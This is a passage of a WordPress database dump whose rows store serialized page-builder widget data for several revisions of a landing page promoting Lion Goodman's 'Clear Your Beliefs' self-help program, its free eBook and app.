Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1045, 1547, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:394:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe width="730" height="411" src="//www.youtube.com/embed/AGU_R_ZB540?rel=0" frameborder="0" allowfullscreen style="margin-top: -43px;"></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:372:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">[Form id="10"]</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:846:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:719:"[su_box title="Special Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1233:"[su_tabs active="2"][su_tab title="<b>What You Can Accomplish with Clear Your Beliefs</b> "][su_row][su_column size="1/2"]\n<ul>\n	<li>Release hurt and pain from the past</li>\n	<li>Clear resistance to taking action</li>\n	<li>Open to new possibilities</li>\n	<li>Eliminate blocks to manifestation</li>\n	<li>Find your true purpose</li>\n	<li>Delete what’s been holding you back</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Change your personality style</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your spiritual nature</li>\n	<li>Become less reactive, more calm</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[/su_row]\n[/su_tab]\n\n[su_tab title="<b>How and Why It Works</b>"]\n<ul>\n	<li>Beliefs are the major cause of upset and unhappiness</li>\n	<li>CYB clears beliefs at the core of the psyche, where they live</li>\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\n	<li>You take charge and decide what you want to believe</li>\n	<li>You’re guided gently, step-by-step, through the entire process</li>\n	<li>You decide how far to go, and what changes to make</li>\n</ul>\n[/su_tab][/su_tabs]";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:579:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1046, 1548, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:394:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe width="730" height="411" src="//www.youtube.com/embed/AGU_R_ZB540?rel=0" frameborder="0" allowfullscreen style="margin-top: -43px;"></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:372:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">[Form id="10"]</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:832:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center;">Start Clearing Whatever\nIs In The Way Right\nNow<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:719:"[su_box title="Special Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1233:"[su_tabs active="2"][su_tab title="<b>What You Can Accomplish with Clear Your Beliefs</b> "][su_row][su_column size="1/2"]\n<ul>\n	<li>Release hurt and pain from the past</li>\n	<li>Clear resistance to taking action</li>\n	<li>Open to new possibilities</li>\n	<li>Eliminate blocks to manifestation</li>\n	<li>Find your true purpose</li>\n	<li>Delete what’s been holding you back</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Change your personality style</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your spiritual nature</li>\n	<li>Become less reactive, more calm</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[/su_row]\n[/su_tab]\n\n[su_tab title="<b>How and Why It Works</b>"]\n<ul>\n	<li>Beliefs are the major cause of upset and unhappiness</li>\n	<li>CYB clears beliefs at the core of the psyche, where they live</li>\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\n	<li>You take charge and decide what you want to believe</li>\n	<li>You’re guided gently, step-by-step, through the entire process</li>\n	<li>You decide how far to go, and what changes to make</li>\n</ul>\n[/su_tab][/su_tabs]";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:579:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1047, 1549, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:394:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe width="730" height="411" src="//www.youtube.com/embed/AGU_R_ZB540?rel=0" frameborder="0" allowfullscreen style="margin-top: -43px;"></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:372:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">[Form id="10"]</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:850:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:719:"[su_box title="Special Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1233:"[su_tabs active="2"][su_tab title="<b>What You Can Accomplish with Clear Your Beliefs</b> "][su_row][su_column size="1/2"]\n<ul>\n	<li>Release hurt and pain from the past</li>\n	<li>Clear resistance to taking action</li>\n	<li>Open to new possibilities</li>\n	<li>Eliminate blocks to manifestation</li>\n	<li>Find your true purpose</li>\n	<li>Delete what’s been holding you back</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Change your personality style</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your spiritual nature</li>\n	<li>Become less reactive, more calm</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[/su_row]\n[/su_tab]\n\n[su_tab title="<b>How and Why It Works</b>"]\n<ul>\n	<li>Beliefs are the major cause of upset and unhappiness</li>\n	<li>CYB clears beliefs at the core of the psyche, where they live</li>\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\n	<li>You take charge and decide what you want to believe</li>\n	<li>You’re guided gently, step-by-step, through the entire process</li>\n	<li>You decide how far to go, and what changes to make</li>\n</ul>\n[/su_tab][/su_tabs]";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:579:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your 